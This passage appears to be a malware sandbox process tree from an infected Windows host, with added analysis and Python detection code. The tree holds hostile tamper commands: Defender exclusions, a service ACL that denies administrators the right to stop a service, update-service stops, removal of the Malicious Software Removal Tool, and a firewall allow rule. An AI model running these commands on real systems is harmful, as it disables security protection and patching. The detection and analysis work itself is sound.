  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
  1⤵
  • Modifies Windows Firewall
  PID:4660
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
  1⤵
  PID:5112
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
  1⤵
  PID:2092
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
  1⤵
  PID:1264
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 992 -ip 992
  1⤵
  PID:1916
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 992 -ip 992
  1⤵
  PID:1956
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
  1⤵
  PID:1704
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
  1⤵
  PID:4104
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 992 -ip 992
  1⤵
  PID:4036
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 992 -ip 992
  1⤵
  PID:1536
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 992 -ip 992
  1⤵
  PID:3496
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 992 -ip 992
  1⤵
  PID:4440
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
  1⤵
  PID:4036
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 992 -ip 992
  1⤵
  PID:5076
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 992 -ip 992
  1⤵
  PID:1156
• C:\Users\Admin\AppData\Local\Temp\AA0B.exe
  C:\Users\Admin\AppData\Local\Temp\AA0B.exe
  1⤵
  PID:2704
• C:\Windows\windefender.exe
  C:\Windows\windefender.exe
  1⤵
  • Executes dropped EXE
  • Modifies data under HKEY_USERS
  PID:4696
• C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  • Suspicious use of AdjustPrivilegeToken
  PID:2460
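The `sc sdset WinDefender ...` command above rewrites the security descriptor of a service named WinDefender (note the spelling: the genuine Defender service is WinDefend). Read as SDDL, the Administrators (BA) allow ACE has SERVICE_STOP (WP) and SERVICE_PAUSE_CONTINUE (DT) removed, and a second, explicit deny ACE `(D;;WPDT;;;BA)` blocks them outright, so `sc stop` from an elevated prompt fails while LocalSystem keeps full control. Administrators do keep WRITE_DAC and SERVICE_CHANGE_CONFIG, so re-applying a stock descriptor with `sc sdset` and then stopping the service still works; the deny ACE also sits after an allow ACE, which is non-canonical ordering and a hint that the descriptor was hand-written. The Python below is an added example, not part of the sandbox report or the sample: it decodes the string and compares what Administrators are left with against a baseline. The baseline descriptor is an assumption, taken from what most stock services carry.

```python
import re

# Service-object meaning of the two-letter SDDL access codes (Windows SDDL
# reference as applied to services; the same letters mean other things on files).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",       "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",       "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",              "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",     "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT", "AL": "ALARM"}
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
            "SU": "Service", "WD": "Everyone", "AU": "Authenticated Users"}

SECTION_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")   # O:/G:/D:/S: parts
ACE_RE = re.compile(r"\(([^)]*)\)")                          # one (...) ACE

# The descriptor from the sandbox tree (sc sdset WinDefender ...).
MALWARE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
                "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Assumed baseline for comparison: the descriptor most stock services carry.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_rights(field):
    """Expand 'CCLCSW...' into right names; a hex mask is returned unchanged."""
    if field.lower().startswith("0x"):
        return [field]
    return [SERVICE_RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)]


def parse_ace(text):
    """ACE fields: type;flags;rights;object_guid;inherit_object_guid;trustee."""
    parts = text.split(";") + [""] * 6
    ace_type, flags, rights, _obj, _inherit_obj, trustee = parts[:6]
    return {"type": ACE_TYPES.get(ace_type, ace_type), "flags": flags,
            "rights": parse_rights(rights), "trustee": TRUSTEES.get(trustee, trustee)}


def parse_sddl(sddl):
    """Split an SDDL string into owner, group, DACL and SACL with decoded ACEs.
    Control flags such as D:P or D:AI are skipped; only the ACEs are kept."""
    out = {"owner": None, "group": None, "dacl": [], "sacl": []}
    for key, body in SECTION_RE.findall(sddl):
        if key in ("O", "G"):
            out["owner" if key == "O" else "group"] = body
        else:
            out["dacl" if key == "D" else "sacl"] = [parse_ace(a) for a in ACE_RE.findall(body)]
    return out


def effective_rights(sddl, trustee):
    """Rights the trustee is left with in the DACL: allow ACEs minus deny ACEs.
    Simplification: real access checks also walk group membership and honour
    ACE order; matching the alias exactly is enough to read what was changed."""
    name = TRUSTEES.get(trustee, trustee)
    allowed, denied = set(), set()
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["trustee"] == name:
            (allowed if ace["type"] == "ALLOW" else denied).update(ace["rights"])
    return allowed - denied


def lost_rights(before, after, trustee):
    """Rights the trustee had under 'before' but not under 'after'."""
    return sorted(effective_rights(before, trustee) - effective_rights(after, trustee))


if __name__ == "__main__":
    for ace in parse_sddl(MALWARE_SDDL)["dacl"]:
        print(f'{ace["type"]:5} {ace["trustee"]:15} {" ".join(ace["rights"])}')
    print("Administrators lost:", lost_rights(DEFAULT_SDDL, MALWARE_SDDL, "BA"))
```

On a live host the same comparison can be run against `sc sdshow <service>` output for every service, flagging any DACL that contains a deny ACE for Administrators or that drops SERVICE_STOP from the BA allow ACE.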
• C:\ProgramData\wikombernizc\reakuqnanrkn.exe
  C:\ProgramData\wikombernizc\reakuqnanrkn.exe
  1⤵
  PID:4256
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      PID:3416
    • C:\Windows\explorer.exe
      explorer.exe
      2⤵
      PID:4364
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
      PID:4604
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      PID:932
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      PID:2868
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      PID:1432
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      PID:2192
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:1176
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:2456
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:4060
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:1916
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:2168
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      PID:4436
• C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  1⤵
  • Executes dropped EXE
  • Checks SCSI registry key(s)
  • Suspicious behavior: MapViewOfSection
  PID:2704
• C:\Windows\system32\wusa.exe
  wusa /uninstall /kb:890830 /quiet /norestart
  1⤵
  PID:4932
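Taken together, the children of reakuqnanrkn.exe (PID 4256) form a patching and AV tamper sequence: a Defender exclusion covering the whole user profile and ProgramData plus every .exe, four powercfg calls that zero the standby and hibernate timeouts so the host never sleeps, `sc stop` against five update-related services (Delivery Optimization, BITS, Windows Update, Update Medic, Update Orchestrator), and `wusa /uninstall /kb:890830`, which removes the Malicious Software Removal Tool. The netsh rule earlier in the tree allows inbound traffic to C:\Windows\rss\csrss.exe, a core system binary name living outside System32. The Python below is an added example, not part of the report: a small set of detection rules run over constructed process-creation events that mirror the command lines in this tree, plus a grouping step that flags a parent whose children trigger several distinct rules. The rule names, the trusted-directory list, the benign look-alike events and the parent PIDs given to the top-level entries are the example's own choices.

```python
import re
from collections import defaultdict

# Services whose stopping commonly precedes tampering with patching or AV delivery.
UPDATE_SERVICES = {"wuauserv", "bits", "dosvc", "waasmedicsvc", "usosvc"}
# Core Windows binaries that should only ever live in System32 / SysWOW64.
SYSTEM_BINARY_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe",
                       "svchost.exe", "winlogon.exe", "wininit.exe"}
# Assumed allow-list of directories a firewall rule may reasonably point at.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")

PATH_RE = re.compile(r'[a-z]:\\[^\s"]+\.exe', re.I)
FIREWALL_RE = re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b'
                         r'.*\bprogram=(?:"([^"]+)"|(\S+))', re.I)
SC_STOP_RE = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)


def defender_exclusion(cmd):
    return re.search(r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", cmd, re.I) is not None


def firewall_allow_untrusted_program(cmd):
    m = FIREWALL_RE.search(cmd)
    if not m:
        return False
    return not (m.group(1) or m.group(2)).lower().startswith(TRUSTED_DIRS)


def system_binary_outside_system32(cmd):
    # Any path on the command line whose file name mimics a core binary.
    for path in PATH_RE.findall(cmd):
        folder, _, name = path.lower().rpartition("\\")
        if name in SYSTEM_BINARY_NAMES and folder + "\\" not in TRUSTED_DIRS[:2]:
            return True
    return False


def update_service_stop(cmd):
    m = SC_STOP_RE.search(cmd)
    return m is not None and m.group(1).lower() in UPDATE_SERVICES


def msrt_uninstall(cmd):
    return re.search(r"\bwusa(?:\.exe)?\b.*/uninstall\b.*/kb:890830\b", cmd, re.I) is not None


def sleep_timeouts_zeroed(cmd):
    return re.search(r"\bpowercfg(?:\.exe)?\b.*-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b",
                     cmd, re.I) is not None


def service_acl_rewrite(cmd):
    # 'sc sdset' is rare on its own; a deny ACE in the new DACL is what locks admins out.
    return re.search(r"\bsc(?:\.exe)?\s+sdset\s+\S+\s+\S*\(D;", cmd, re.I) is not None


RULES = [defender_exclusion, firewall_allow_untrusted_program, system_binary_outside_system32,
         update_service_stop, msrt_uninstall, sleep_timeouts_zeroed, service_acl_rewrite]


def classify(cmd):
    """Names of the rules a single command line triggers, in RULES order."""
    return [rule.__name__ for rule in RULES if rule(cmd)]


def scan(events):
    """events: iterable of (pid, ppid, cmdline). Returns only the flagged ones."""
    hits = []
    for pid, ppid, cmd in events:
        rules = classify(cmd)
        if rules:
            hits.append({"pid": pid, "ppid": ppid, "rules": rules})
    return hits


def tamper_clusters(events, threshold=3):
    """Parents whose children trip >= threshold distinct rules; unknown parents are skipped."""
    by_parent = defaultdict(set)
    for hit in scan(events):
        if hit["ppid"] is not None:
            by_parent[hit["ppid"]].update(hit["rules"])
    return {ppid: sorted(rules) for ppid, rules in by_parent.items() if len(rules) >= threshold}


# Constructed events: command lines from this tree (parent None = not shown on the page)
# followed by benign look-alikes that must stay quiet.
SAMPLE_EVENTS = [
    (4660, None, 'netsh advfirewall firewall add rule name="csrss" dir=in action=allow '
                 'program="C:\\Windows\\rss\\csrss.exe" enable=yes'),
    (2460, None, "cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                 "(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
                 "(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"),
    (3416, 4256, "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, "
                 "$env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (932, 4256, "powercfg.exe /x -standby-timeout-dc 0"),
    (2868, 4256, "powercfg.exe /x -standby-timeout-ac 0"),
    (1176, 4256, "sc.exe stop dosvc"),
    (2456, 4256, "sc.exe stop bits"),
    (4060, 4256, "sc.exe stop wuauserv"),
    (1916, 4256, "sc.exe stop WaaSMedicSvc"),
    (2168, 4256, "sc.exe stop UsoSvc"),
    (4436, 4256, "cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (100, 500, "sc.exe query wuauserv"),
    (101, 500, 'netsh advfirewall firewall add rule name="Chrome" dir=in action=allow '
               'program="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" enable=yes'),
    (102, 500, "powercfg.exe /x -standby-timeout-ac 30"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
    print("clusters:", tamper_clusters(SAMPLE_EVENTS))
```

Each rule on its own is noisy in an enterprise (admins do stop wuauserv and add exclusions); the cluster step is what turns the individual hits into a confident alert, because one parent driving an exclusion, service stops, an MSRT removal and power-plan changes within seconds has no administrative counterpart.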
• C:\Users\Admin\AppData\Local\Temp\D216.exe
  C:\Users\Admin\AppData\Local\Temp\D216.exe
  1⤵
  PID:2700
    • C:\Users\Admin\AppData\Local\Temp\D216.exe
      C:\Users\Admin\AppData\Local\Temp\D216.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      PID:2780
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\ad444082-f4b8-4a6d-992f-793edc7f4d66" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          3⤵
          • Modifies file permissions
          PID:1416
        • C:\Users\Admin\AppData\Local\Temp\D216.exe
          "C:\Users\Admin\AppData\Local\Temp\D216.exe" --Admin IsNotAutoStart IsNotTask
          3⤵
          PID:3416
            • C:\Users\Admin\AppData\Local\Temp\D216.exe
              "C:\Users\Admin\AppData\Local\Temp\D216.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5056
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 568
                                                                                                                                                      5⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2908
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5056 -ip 5056
                                                                                                                                              1⤵
                                                                                                                                                PID:4136
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D91C.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D91C.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1436
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 552
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4648
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 572
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4524
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 680
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4996
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 680
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:2416
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1056
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4636
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1072
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4084
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1104
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:1104
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1436 -ip 1436
                                                                                                                                                1⤵
                                                                                                                                                  PID:1944
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1436 -ip 1436
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2192
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1436 -ip 1436
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4268
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1436 -ip 1436
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:4256
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1436 -ip 1436
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4756
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1436 -ip 1436
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2180
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4128 -ip 4128
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1152
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /t 5
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1852
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\tffiuru
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\tffiuru
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:2700
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F139.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F139.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:1884
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4572
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1436 -ip 1436
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3332
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2680
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 992 -ip 992
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4252
                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                    explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies Installed Components in the registry
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:3328
                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3328 -s 6064
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3384
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4960
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies Installed Components in the registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
  PID:3416
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:436
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:1312
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:4088
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:4664
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:4340
• C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 572 -p 4088 -ip 4088
  1⤵
  PID:3288
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:996
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:212
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3684
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:3236
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:4368
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3732
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:4280
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:4244
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:4360
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:732
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:2372
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:5012
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:3508
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
